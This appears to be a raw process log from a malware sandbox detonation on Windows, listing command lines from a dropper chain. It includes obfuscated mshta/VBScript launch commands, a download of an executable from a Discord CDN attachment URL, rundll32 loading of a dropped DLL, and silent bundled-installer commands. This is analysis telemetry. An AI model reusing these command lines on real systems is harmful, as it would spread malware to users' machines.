C:\Users\Admin\Documents\ygRw4vsp5aXIfWMlbpniVP9J.exe
"C:\Users\Admin\Documents\ygRw4vsp5aXIfWMlbpniVP9J.exe"
C:\Users\Admin\Documents\Np9HXtpLBuBCSA_xWH93BhyI.exe
"C:\Users\Admin\Documents\Np9HXtpLBuBCSA_xWH93BhyI.exe"
C:\Users\Admin\Documents\DSBM8l0UPwHBGY766donVVQm.exe
"C:\Users\Admin\Documents\DSBM8l0UPwHBGY766donVVQm.exe"
C:\Users\Admin\Documents\JECTSnYdIFXrgLSd11VIX8LB.exe
"C:\Users\Admin\Documents\JECTSnYdIFXrgLSd11VIX8LB.exe"
C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe
"C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\8403.bat C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe"
C:\Users\Admin\AppData\Local\Temp\is-QF7NU.tmp\5YJz1sN3WcARkkKdi401MNKQ.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QF7NU.tmp\5YJz1sN3WcARkkKdi401MNKQ.tmp" /SL5="$70306,138429,56832,C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe"
C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe
"C:\Users\Admin\Documents\euXsNX1fFj42iYiFJ9BI28ku.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5384 -ip 5384
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 280
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3280 -ip 3280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 424 -ip 424
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7744 -ip 7744
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7bd4ad63-9d96-4e4d-bb77-8d34a1190305}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "FDmp1Bj4S03mI1BrOyUPOUKY.exe" -f
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 280
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 884
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\3159338.exe
"C:\Users\Admin\AppData\Roaming\3159338.exe"
C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe
"C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe" -q
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1604 -ip 1604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4324 -ip 4324
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\2104144.exe
"C:\Users\Admin\AppData\Roaming\2104144.exe"
C:\Users\Admin\AppData\Roaming\8656029.exe
"C:\Users\Admin\AppData\Roaming\8656029.exe"
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2544 -ip 2544
C:\Users\Admin\AppData\Roaming\2470649.exe
"C:\Users\Admin\AppData\Roaming\2470649.exe"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "79a6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 280
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 296
C:\Users\Admin\Documents\xhHbGyxpTSs0YNPujV4XzOPV.exe
"C:\Users\Admin\Documents\xhHbGyxpTSs0YNPujV4XzOPV.exe"
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\8401.tmp\8402.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\8571\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6436 -ip 6436
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7240 -ip 7240
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\is-6G1B4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6G1B4.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7240 -s 460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 276
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe
"C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5348 -ip 5348
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x7c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2F580D91C9B94D8E747EEF9E96BDB17F C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5348 -s 2416
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 496 -ip 496
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwefipaf.e5g\ufgaa.exe & exit
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 2436
C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe
C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe /eufive
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6896 -ip 6896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 280
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8804 -ip 8804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8804 -s 60
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 8584 -ip 8584
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8584 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yblew45k.5ik\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5660 /prefetch:2
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
